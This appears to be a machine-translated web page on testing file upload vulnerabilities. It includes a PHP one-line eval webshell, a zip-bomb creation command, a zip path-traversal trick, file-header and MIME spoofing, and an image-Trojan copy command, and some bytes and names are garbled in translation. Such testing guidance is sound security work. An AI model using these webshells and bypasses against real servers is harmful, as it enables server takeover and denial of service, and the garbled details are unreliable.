I. attack scenarios
- Upload webshell directly
- describedMany application systems or components provide file upload functions. If there are no restrictions on the type of file upload, you can upload webshell at will, thereby controlling the entire server.
test method
First, find all pages where files can be uploaded, determine the server-side technology (such as jsp,php,asp) used by the application system, directly upload a one-sentence Trojan, and then use the one-sentence Trojan client (Chinese Knife) to connect to obtain the webshell. Taking php as an example, prepare a php one-sentence Trojan:
<? php
@eval($_POST[value]);
?& gt;
After uploading, you get the upload path, use a Chinese kitchen knife to connect, and execute to obtain the webshell.
- Bypass client verification
- describedIf you only use client-side scripts such as JavaScript to verify uploaded file extensions, it is easy to bypass client-side verification through proxy tools.
- test methodAssuming that the application system has verified file upload and is not allowed to upload script files such as jsp,php,asp, etc., upload the script file first, and then look at the prompt. Usually, if you use client verification, a dialog box will pop up that the upload file is illegal, as if you have not experienced server processing. At this time, if you need further confirmation, you can use the browser to view the code function. Taking chrome as an example, you can right-click on the upload button to review the elements and look at the processing logic of js.
If there is verification extension logic in js, you can use burpsuite to intercept legal upload requests and modify the file extension.
- Case, encoding, server characteristics, etc. bypass verification
- describedA simple filter strategy for file extensions can be circumvented by converting case and encoding yourself to take advantage of web server features.
- test method
File name bypass verification
- Upload large compressed files
- describedMany application systems allow uploading compressed files, and have limits on the size of the compressed file. By making a highly compressed file, a file of several gigabytes is compressed into several megabytes, so that the system limit will not exceed the size, and the file will be decompressed in the background. When decompressing, it will put huge pressure on the cpu, memory, and disk, which may cause a denial of service attack.
- test methodFirst, use the command to create a file with a high compression ratio of 1000 on operating systems such as Kali Linux or BT Linux. The specific command is as follows:
DD if=/dev/zero count=$((1024*1024)) bs=1024 | zip -9 big.zip –
Get a very large compressed file, and finally upload big.zip to check whether the cpu, memory, and disk data suddenly increases or reaches a bottleneck.
- Change the upload path
- describedMany application systems allow the upload of compressed files and limit the size of the uploaded compressed file, but do not verify the file type in the compressed file, and there are no restrictions on the path to extract files, allowing attackers to change the upload path and upload webshell.
- test methodSuppose you want to upload a webshell to the following path,../../ home/test/test.php, prepare a webshell with an extension of txt, and any file name, but the length must be the same as the length of the path you want to upload. Such as:
../../ home/test/test.php
11111111111111111111.txt
They are all 24 characters.
Then compress the txt file, and use a hexadecimal editor to edit 1111111111111111.txt to../../ home/test/test.php, then save and upload, and finally the application system will unpack the webshell to the above path to achieve the purpose of obtaining the webshell.
- Bypass MIME type detection
- describedSome application systems only verify uploaded files by checking the MIME type of the file. For example, the MIME type of a jpg file is image/jpeg, and the type of an html file is text/html. In this case, you only need to change the MIME type of the file to be uploaded in the request sent to bypass the verification
- test methodTaking php as an example, the upload control limits only to uploading gif files. First, upload a php file directly and use burpsuite interception. In the request header, you can see that the value of Content Type is text/plain. Other may be displayed. Change it to image/gif to bypass the request.
- Bypass file content verification
- describedSometimes the system checks the file header on the server, and the server uses gettiagesize () to verify the image file, adding some image format information in front of the file content to bypass the server's verification of the file header.
- test methodTake the image upload function as an example
Add picture information in front of the attack script, upload jpg and add FF S8 FF Et00 10 4A 46 49 46, upload png and add 89 50 4E 47, upload gif and add 47 49 46 38 39 61, and rename the upload script test.php to test.jpg.
The upload function was executed and the attack script was accessed. The attack was successful.
- Execution picture Trojan
- describedSometimes it is impossible to upload webshells such as php,jsp, and asp through multiple methods. At this time, you can try to use the copy command to make an image Trojan, and execute the image Trojan by using the file containing vulnerabilities to achieve the purpose of obtaining the webshell.
- test methodTake php as an example. First prepare a picture, then prepare a one-sentence Trojan horse, and put the two files in the same directory.
Open cmd, enter the directory, and enter the command: copy 1.gif/b+1.php/a 2.gif
At this point, the 2.gif image Trojan has been made, upload the Trojan, and then look for the file that contains vulnerabilities. Just include the image Trojan directly. Taking php as an example, the url of the file that contains vulnerabilities is generally like this, 127.0.0.1/test/test.php? file=2.gif, directly put this link into the Chinese kitchen knife to get the webshell
II. impact
Could cause the attacker to upload webshells arbitrarily, thereby taking control of the server
English 
Chinese
Comments0